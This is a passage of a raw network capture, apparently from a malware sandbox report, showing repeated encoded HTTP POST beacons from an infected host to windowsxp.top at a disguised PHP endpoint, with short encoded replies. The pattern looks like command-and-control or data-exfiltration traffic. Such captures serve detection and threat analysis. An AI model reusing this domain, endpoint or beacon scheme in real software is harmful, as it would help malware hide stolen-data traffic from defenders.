                                                                                                                  Oct 27, 2024 19:24:14.102468014 CET1692OUTData Raw: 55 5b 58 54 5e 58 53 53 54 58 57 54 54 5d 5b 52 59 5d 5b 59 52 5f 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[XT^XSSTXWTT][RY][YR_RST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\'.0[6"&/9$0',.U=,? 2+-.+_=Z.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:14.356313944 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.560854912 CET926INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNqmp1cEHhwbuQnikZjWWGICzphm%2FBCLVkJOyb2ee1FqtQgZz8%2FGPYWKBdCKRUQieeSSNPIbnaOKKK%2FXCn4HuILM3MTLL1UlA8V%2BUe%2BQuP8zOqV%2B8bJQZTrrDtgNiCN3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8c95c9b4608-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1943&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2013&delivery_rate=743708&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 1a 23 3d 20 56 3d 05 21 1c 29 08 21 58 33 3f 22 00 2f 0c 34 1c 2a 2d 32 0d 2f 2b 3e 54 27 34 31 0b 2b 00 24 11 34 10 2f 0f 3d 0f 21 5e 00 1c 24 03 35 2e 21 50 31 3b 0d 06 30 30 30 16 23 2e 24 07 2a 2d 31 50 28 39 38 5e 28 16 33 17 2c 01 0b 50 25 3a 3d 07 2f 5e 3d 02 3f 00 2a 54 0c 14 22 03 2e 3f 3c 1c 23 31 3e 0a 29 0b 20 1e 24 00 01 0e 33 04 3c 54 3f 12 3b 5e 28 3e 3d 10 22 12 3b 00 28 38 29 05 25 2e 38 05 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"#= V=!)!X3?"/4*-2/+>T'41+$4/=!^$5.!P1;000#.$*-1P(98^(3,P%:=/^=?*T".?<#1>) $3<T?;^(>=";(8)%.8)."T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  99192.168.2.450112188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:14.185909033 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:14.540019035 CET1012OUTData Raw: 50 57 58 5b 5b 5f 56 53 54 58 57 54 54 51 5b 5b 59 51 5b 59 52 57 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX[[_VSTXWTTQ[[YQ[YRWR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%7":)_!P#.<3',8U=44?-.$)?*.?!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:14.792488098 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.998650074 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP9XgswRyYgthfUD7r5VHGLSuNu41Z2Ur3KlhVpGu7xvcO1j8AWT6ZgDy7N0nYEjB6UdI56iCwRAqrXwVPpF6EmqE70t948dUsuAKVfnigMBuS5HYKj8i4PI8b%2Fkfae0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8cc1fd0469e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1247200&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  100192.168.2.450113188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:15.125442982 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:15.477507114 CET1012OUTData Raw: 55 57 58 5b 5b 58 56 52 54 58 57 54 54 57 5b 53 59 5f 5b 50 52 50 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWX[[XVRTXWTTW[SY_[PRPRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1?69="^,'/'8#/>,T*; ,=?,9:!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:15.740102053 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:16.048201084 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zepb6qanmgA3N%2F6Pn2N9hAURA8bf60TkCyaGtx%2BPDgKIwaJht0ycUhd0w5lhm8d6DpiqqHd5h%2FCBJaOFpN5Zxt%2FkRBT%2Bybfg%2BaMikwtmI1mGi6yNqZAFcKsfihMeEj9s"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8d1fb1f2d2d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1059253&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  101192.168.2.450114188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:16.168631077 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:16.526814938 CET1012OUTData Raw: 55 52 58 5a 5b 5e 56 55 54 58 57 54 54 54 5b 5c 59 59 5b 50 52 5f 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: URXZ[^VUTXWTTT[\YY[PR_R_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&-(_":!!&^9]$;4U/=$T>""/Z-.7=-!Y##X('
                                                                                                                  Oct 27, 2024 19:24:16.759497881 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:16.955605030 CET770INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dmZUqI6ObQwBSLjl%2FOrwMHL8R7to76JLy3bWJDas9skwUzdqJMuohwYhfQ7x04yiwmaWuMgpA7TF4CYiqhRqSHzUcWak8GBeJRzGCVTYs1lg%2FjXsXPfvl4KEd8goatZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8d859c9e722-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1329&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  102192.168.2.450115188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:17.086993933 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:17.446266890 CET1012OUTData Raw: 50 52 58 5e 5b 58 56 55 54 58 57 54 54 53 5b 5f 59 5e 5b 5c 52 5f 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRX^[XVUTXWTTS[_Y^[\R_RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.X":&66'.,]'$P-.;*/?"1;[->7=?:9/!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:17.697381020 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:17.918967009 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7wNeF9lSFRY%2FUaF9C3T%2BTf5fE6kA3JLu4XqrKJPt7ODB%2FkSJP%2F95mdON6JvFPpYEQx4fpubHZnpb11mZAbPvKUBHdgPInVAkUZm98mK0G0JzfzcvdrO%2FA2DdCt1uWmQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8de39744642-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1056&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1363465&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  103192.168.2.450116188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:18.042757034 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:18.399497032 CET1008OUTData Raw: 55 50 5d 5f 5e 5b 56 53 54 58 57 54 54 55 5b 5d 59 59 5b 5c 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UP]_^[VSTXWTTU[]YY[\RSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1>(X!*%6[9 0#8-8W=,# 2,'Y>?>_,/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:18.647559881 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:18.838102102 CET777INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YYCSDpfqBB01GSiLjmdigh%2B8rmijQoOZ5E1EF4GRxqi5t%2BfTJcIukR5dKh%2Bfi%2FBxWOIw4hjWd2Z3W%2FAUP28OHE5MXOt2XEYNev1ShadAaiNX%2FpQ%2B21TISDIZ%2F2xuC5V"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8e42a626c56-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1231292&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:18.838288069 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  104192.168.2.450117188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:18.966994047 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:19.322119951 CET1012OUTData Raw: 55 50 58 5d 5b 59 53 52 54 58 57 54 54 54 5b 5a 59 50 5b 5a 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX][YSRTXWTTT[ZYP[ZRQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2.(")%Y66:+3+;8V(,?#88#*<):!Y##X('
                                                                                                                  Oct 27, 2024 19:24:19.556583881 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:19.866328955 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l0dw7pH3gsvwsyELCOn6qFMj4Za21DD6t7rz9ww6iDnIRBtDDbs9R1OFx9q3Xj4AJlWI1HPcNmLNIOptySN40cwBXa4gqLMsBrvEjvH%2BYJi2PZclwiCSVjUoP%2B%2BJSAhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8e9d8db486b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1996&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=722554&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  105192.168.2.450118188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:19.577697039 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:19.930756092 CET1716OUTData Raw: 50 50 58 54 5e 5e 53 53 54 58 57 54 54 52 5b 5d 59 5d 5b 5b 52 50 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^^SSTXWTTR[]Y][[RPR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X0[5#&'.$ ^$+7/=;=<$U "0/<>&[9!Y##X(
                                                                                                                  Oct 27, 2024 19:24:20.179857016 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:20.386346102 CET927INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Om3qP7ZIbnmuTaM3%2BEbJ1H4iQud6rWSfWjZkE0P98HvGZXsapPXq%2BJEUjqGMU7tqlG%2BdQ0aQtxN6a9CxkQjX%2FxnZpfYQaa%2FUoXIgOB%2FfzLPV5cuV08QYo1hpasSJee3i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8edcdc44787-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 58 23 07 2b 0d 3d 3c 07 55 3e 1f 29 5f 24 3f 39 13 3b 0b 34 1c 3d 2d 14 0c 2f 38 2e 55 27 1a 07 0b 3c 07 2f 01 23 3d 37 0a 3d 0f 21 5e 00 1c 27 5e 22 3d 39 56 31 02 30 5b 25 33 24 17 22 04 20 04 3e 00 32 08 3c 39 3c 12 3c 01 33 55 2f 2f 29 56 31 00 39 06 2c 01 3e 5f 3c 2a 2a 54 0c 14 21 5a 3a 11 34 11 21 1f 3d 57 3d 0c 3c 5d 27 00 28 15 33 29 2c 56 2b 2c 05 58 3f 13 17 5c 36 12 23 03 2b 01 3e 5f 24 13 3b 13 3d 14 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"X#+=<U>)_$?9;4=-/8.U'</#=7=!^'^"=9V10[%3$" >2<9<<3U//)V19,>_<**T!Z:4!=W=<]'(3),V+,X?\6#+>_$;="T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  106192.168.2.450119188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:20.000281096 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:20.352725983 CET1012OUTData Raw: 50 57 58 58 5e 58 53 54 54 58 57 54 54 57 5b 5e 59 5c 5b 58 52 56 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWXX^XSTTXWTTW[^Y\[XRVR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y13":>"<Z9#3^8/=<V>$ _/-=/=.?!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:20.596128941 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:20.906261921 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOt7joyUtI%2F3cgRgbgRyBGNSE36ZMOA47P1Q2duEOt%2F8cyR4sCRlaUzUeaBzQbAdMJCafnPdgl45b4hSGuXI0RffMi5oHGyIQa2BfUnf1o4Vtt1xljUHyEC9%2BHVozWIq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8f05fcf35a2-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1470050&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  107192.168.2.450120188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:21.031635046 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
